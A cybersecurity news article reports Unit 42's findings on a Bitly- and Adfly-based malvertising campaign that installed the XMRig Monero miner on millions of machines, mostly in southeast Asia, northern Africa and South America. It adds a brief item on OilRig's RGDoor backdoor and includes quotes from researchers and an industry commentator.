Millions of machines download cryptominer after users click on devious link

News by Bradley Barth

A newly discovered malicious URL redirection campaign that infects users with the XMRig Monero cryptocurrency miner has already victimised users between 15 and 30 million times, researchers have reported.

A newly discovered malicious URL redirection campaign that infects users with the XMRig Monero cryptocurrency miner has already victimised users between 15 and 30 million times, researchers have reported.

Operating for less than five months, the campaign has particularly hit hard countries in southeast Asia, northern Africa and South America, according to a 24 January blog post from Palo Alto Networks' Unit 42 threat research team. Telemetry data indicates that over 3.5 million victims are based in Thailand alone, with Vietnam (more than 1.8 million) and Egypt (roughly 1.1 million) the next most frequently attacked geographic targets.

The attacks are generally carried out by combining redirection services with the URL shortener Bitly, in order to present deceitful malvertising links on various legitimate websites. These advertisements were delivered via Adfly, an ad-based redirection service.

"It appears that Adfly is the method of distribution to unwitting users, while Bitly is being abused by the malware authors to eventually download XMRig," explained Christopher Budd, senior threat communications manager at Palo Alto, in an email interview with SC Media US. (Budd noted that, upon disclosure, Bitly removed the offending URLs in timely fashion.)

Website visitors who click on these shortened links believe they are downloading advertised files, updates or services (e.g. file sharing services), but they are actually being redirected to another domain that use a infection chain to download XMRig, a legitimate mining tool that in this case is being used unethically to secretly harness victims' processing power.

The infection process typically starts with the downloading of a malicious executable that in turn drops a VBS and LNK file (the latter for persistence). The VBS file then leverages various HTTP redirection services (prior to 20 October, 2017, it was leveraging Microsoft Windows' BITSAdmin tool) to download and execute another remote VBS file. This secondary VBS file fingerprints the infected machine and then installs the appropriate version of XMRig.

Researchers have already identified over 250 unique Windows-based executables used in this campaign, more than half of which were downloaded from 4sync, an online cloud storage provider. In addition to executing the cryptominer via VBS files, the malware also uses XMRig proxy services to hide the mining pool destination and uses Nicehash, a marketplace that connects customers who wish to buy or sell hashing processing power.

Because Bitly clicks can be tracked, Unit 42 researchers were able to identify roughly 15 million redirections as a result of this campaign. However, fewer than half of the observed XMRig campaign samples use bitly, leading Palo Alto researchers to conclude that the actual number of malicious redirects is likely closer to 30 million.

"Monero mining campaigns are certainly not a new development... However, it is less common to observe such a large-scale campaign go relatively unnoticed for such a long period of time," wrote blog post author and Palo Alto threat intelligence analyst Josh Grunzweig. "By targeting random end-users via malicious advertisements, using seemingly innocuous names for the malware files, and using both built-in Windows utilities and scripting files, the attackers are able to gain a foothold on victim systems at large scale."

In a separate blog post published yesterday, Unit 42 revealed that the Iran-linked APT group known as OilRig clandestinely installed an Internet Information Services (IIS) backdoor called RGDoor on the web servers of eight Middle Eastern government organisations, as well as one financial institution and one educational institution.

The researchers believe the backdoor was installed as an insurance measure in case these institutions discovered that they had been previously compromised and infected with a malicious webshell called TwoFace. In such a scenario, the attackers would still have access to the webservers, even if TwoFace was removed.

Ilia Kolochenko, CEO of web security company, High-Tech Bridge comments: “With the steady growth and popularity of digital currencies, we should expect continuous and persistent growth of attacks targeting the wallets and/or installing malware to mine the coins. 

"Unlike credit cards, PayPal or bank accounts, digital currencies are a unique opportunity for cyber-criminals to use stolen [digital] money without risks of being halted or having their money frozen. Law enforcement and governments have virtually no control over the digital coins and cannot intervene in the game at the moment. Therefore, using all previously available and some emerging techniques of phishing and drive-by-download attacks, cyber-criminals will likely focus their efforts on cryptocurrencies in the near future.”

Crime & Threats

Find this article useful?

Get more great articles like this in your inbox every lunchtime

Webcasts and interviews 

Interview - Everyone has an Achilles heel: The new security paradigm

How can we defend networks now that the perimeter has all but disappeared?
Brought to you in partnership with ExtraHop